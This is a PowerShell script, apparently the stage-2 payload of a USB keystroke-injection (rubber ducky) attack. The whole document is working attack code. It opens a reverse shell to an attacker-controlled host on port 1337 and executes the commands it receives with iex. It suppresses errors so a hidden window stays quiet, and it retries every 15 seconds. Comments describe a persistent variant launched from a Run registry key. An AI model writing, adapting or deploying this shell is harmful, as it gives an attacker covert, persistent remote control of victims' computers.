# Stage-2 shell body, served over HTTP and executed on the target. # Fetched by the "fetch" one-shot variant and by the persistent variant's Run key. # Because this is DOWNLOADED rather than typed, none of the Win+R length limit or # the dk-layout charset rules apply here - full quoting is available. # # Design notes: # - Outer retry loop: the ducky often types before the listener is ready, and a # dropped connection should come back on its own. Without this a transient # failure costs a physical re-plug. # - $ErrorActionPreference is silenced so a failed connect does not spew errors # into a hidden window. $ErrorActionPreference = 'SilentlyContinue' $ip = '192.168.206.133' $port = 1337 while ($true) { try { $c = New-Object Net.Sockets.TCPClient $c.Connect($ip, $port) $s = $c.GetStream() $e = [Text.Encoding]::ASCII $b = [byte[]]::new(65536) while (($i = $s.Read($b, 0, 65536)) -gt 0) { $r = iex ($e.GetString($b, 0, $i)) | Out-String $s.Write($e.GetBytes($r)) $s.Flush() } } catch {} Start-Sleep -Seconds 15 }